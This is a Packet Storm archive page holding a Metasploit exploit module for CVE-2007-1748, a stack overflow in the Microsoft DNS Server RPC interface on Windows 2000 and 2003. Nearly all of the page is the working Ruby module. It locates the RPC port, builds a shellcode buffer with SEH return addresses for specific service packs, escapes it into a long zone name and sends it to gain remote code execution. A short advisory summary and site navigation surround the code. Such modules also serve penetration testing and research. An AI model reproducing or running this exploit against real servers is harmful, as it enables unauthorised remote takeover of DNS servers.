exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

msdns_zonename.rb.txt

msdns_zonename.rb.txt
Posted Apr 17, 2007
Authored by H D Moore | Site metasploit.com

This Metasploit module exploits a stack overflow in the RPC interface of the Microsoft DNS service. The vulnerability is triggered when a long zone name is supplied that contains escaped characters. This exploit will NOT work on Windows 2003 SP1 or SP2 if hardware DEP is enabled.

tags | exploit, overflow
systems | windows
advisories | CVE-2007-1748
SHA-256 | 9e489d03059ad614ec6b6212926d5c4b2852414c9f8a30464d6ccd7e43d0f9ca

msdns_zonename.rb.txt

Change Mirror Download
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'

module Msf

class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remote

include Exploit::Remote::DCERPC
include Exploit::Remote::Seh

def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft DNS RPC Service extractQuotedChar() Overflow',
'Description' => %q{
This module exploits a stack overflow in the RPC interface
of the Microsoft DNS service. The vulnerability is triggered when
a long zone name is supplied that contains escaped characters. This
exploit will NOT work on Windows 2003 SP1 or SP2 if hardware DEP is
enabled.

},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['CVE', '2007-1748'],
['URL', 'http://www.microsoft.com/technet/security/advisory/935964.mspx']
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Payload' =>
{
'Space' => 1024,

# The payload doesn't matter, but make_nops() uses these too
'BadChars' => "\x00",

'StackAdjustment' => -3500,

},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 2000 SP0-SP4 / Windows 2003 SP0-SP2 English',
{
'Addresses' => # Offsets must not overlap -4 or +9
[
[ 1213, 0x75022ac4 ], # Windows 2000 SP0-SP4 ws2help.dll
[ 1593, 0x7ffc0960 ], # Windows 2003 SP0 ??? (unreliable?)
[ 1633, 0x76a81a60 ], # Windows 2003 SP1-SP2 atl.dll
]
}
],

# WS2HELP.DLL
[ 'Windows 2000 Server SP0-SP4+ English', { 'Off' => 1213, 'Ret' => 0x75022ac4 } ],

# Unknown, probably unreliable
[ 'Windows 2003 Server SP0 English', { 'Off' => 1593, 'Ret' => 0x7ffc0960 } ],

# ATL.DLL (no SafeSEH) (still blocked by hardware DEP)
[ 'Windows 2003 Server SP1-SP2 English', { 'Off' => 1633, 'Ret' => 0x76a81a60 } ],

],
'DisclosureDate' => 'Apr 12 2007',
'DefaultTarget' => 0 ))

register_options(
[
Opt::RPORT(0)
], self.class)
end

def exploit


# Ask the endpoint mapper to locate the port for us
dport = datastore['RPORT'].to_i
if (dport == 0)

dport = dcerpc_endpoint_find_tcp(datastore['RHOST'], '50abc2a4-574d-40b3-9d66-ee4fd5fba076', '5.0', 'ncacn_ip_tcp')

if (not dport)
print_status("Could not determine the RPC port used by the Microsoft DNS Server")
return
end

print_status("Discovered Microsoft DNS Server RPC service on port #{dport}")
end

# Connect to the high RPC port
connect(true, { 'RPORT' => dport })
print_status("Trying target #{target.name}...")

# Bind to the service
handle = dcerpc_handle('50abc2a4-574d-40b3-9d66-ee4fd5fba076', '5.0', 'ncacn_ip_tcp', [datastore['RPORT']])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")

# Create our buffer with our shellcode first
txt = Rex::Text.rand_text_alphanumeric(8192)
txt[0, payload.encoded.length] = payload.encoded

# Handle multi-return targets
if (target['Addresses'])
target['Addresses'].each do |ent|
off, ret = ent
txt[ off ] = [ret].pack('V')
txt[ off - 4, 2] = "\xeb\x06"
txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')
end
# Handle single-return targets
else
off = target['Off']
txt[ off ] = [target.ret].pack('V')
txt[ off - 4, 2] = "\xeb\x06"
txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')
end

req = ''

# Convert the string to escaped octal
txt.unpack('C*').each do |c|
req << "\\"
req << c.to_s(8)
end

# Build the RPC stub data
stubdata =
NDR.long(rand(0xffffffff)) +
NDR.wstring(Rex::Text.rand_text_alpha(1) + "\x00\x00") +

NDR.long(rand(0xffffffff)) +
NDR.string(req + "\x00") +

NDR.long(rand(0xffffffff)) +
NDR.string(Rex::Text.rand_text_alpha(1) + "\x00")

print_status('Sending exploit...')

begin
response = dcerpc.call(1, stubdata)

if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
print_status(">> " + dcerpc.last_response.stub_data.unpack("H*")[0])
end
rescue ::Exception => e
print_status("Error: #{e}")
end

handler
disconnect
end

end
end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close